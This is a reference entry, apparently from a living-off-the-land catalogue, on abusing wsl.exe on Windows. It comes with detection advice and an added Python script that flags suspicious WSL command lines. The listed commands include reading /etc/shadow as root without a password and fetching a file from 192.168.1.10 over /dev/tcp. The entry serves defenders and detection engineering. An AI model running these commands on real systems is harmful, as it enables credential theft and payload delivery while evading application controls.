Wsl.exe

Windows Subsystem for Linux executable


Paths:


Resources:
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Acknowledgement:
Alex Ionescu - @aionescu
Matt - @NotoriousRebel1
Asif Matadar - @d1r4c


Detection:
Child process from wsl.exe
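
One way to turn this detection into triage logic, as an added example that is not part of the original entry. Field names follow Sysmon process-creation events; the sample events and rule names are constructed assumptions, and the command-line rules go beyond the single detection line above, using the commands listed on this page.

```python
import ntpath
import re

# Command-line traits taken from the wsl.exe commands listed on this page.
CMDLINE_RULES = {
    "exec_flag": re.compile(r"(?:^|\s)(?:-e|--exec)(?:\s|$)"),
    "run_as_root": re.compile(r"(?:^|\s)(?:-u|--user)\s+root(?:\s|$)"),
    "dev_tcp_redirect": re.compile(r"/dev/tcp/"),
}

def _is_wsl(path):
    # ntpath parses Windows paths correctly on any analysis host.
    return ntpath.basename(path or "").lower() == "wsl.exe"

def triage(event):
    """Return the sorted findings for one process-creation event."""
    findings = []
    if _is_wsl(event.get("ParentImage")):
        findings.append("child_of_wsl")      # the page's detection
    if _is_wsl(event.get("Image")):
        cmd = event.get("CommandLine", "")
        findings += [n for n, rx in CMDLINE_RULES.items() if rx.search(cmd)]
    return sorted(findings)

def scan(events):
    """Return (command line, findings) for every event with a finding."""
    return [(e["CommandLine"], triage(e)) for e in events if triage(e)]

WSL = r"C:\Windows\System32\wsl.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample events (hypothetical, not captured telemetry).
SAMPLE_EVENTS = [
    {"Image": WSL, "ParentImage": CMD,
     "CommandLine": "wsl.exe -e /mnt/c/Windows/System32/calc.exe"},
    {"Image": WSL, "ParentImage": CMD,
     "CommandLine": "wsl.exe -u root -e cat /etc/shadow"},
    {"Image": WSL, "ParentImage": CMD,
     "CommandLine": "wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'"},
    {"Image": r"C:\Windows\System32\calc.exe", "ParentImage": WSL,
     "CommandLine": "calc.exe"},
    {"Image": WSL, "ParentImage": CMD,
     "CommandLine": "wsl.exe --list --verbose"},
]

if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_EVENTS):
        print(f"{', '.join(findings):32} {cmdline}")
```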



Execute

Executes calc.exe from wsl.exe
wsl.exe -e /mnt/c/Windows/System32/calc.exe
Usecase: Executes the specified file; can be used to execute arbitrary Linux commands.
Privileges required: User
OS: Windows 10, Windows 19 Server
Mitre: T1202



Cats /etc/shadow file as root
wsl.exe -u root -e cat /etc/shadow
Usecase: Executes arbitrary Linux commands as root without needing a password.
Privileges required: User
OS: Windows 10, Windows 19 Server
Mitre: T1202



Cats a file through bash
wsl.exe --exec bash -c 'cat file'
Usecase: Executes arbitrary Linux commands.
Privileges required: User
OS: Windows 10, Windows 19 Server
Mitre: T1202



Download

Downloads file from 192.168.1.10
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Usecase: Download file
Privileges required: User
OS: Windows 10, Windows 19 Server
Mitre: T1202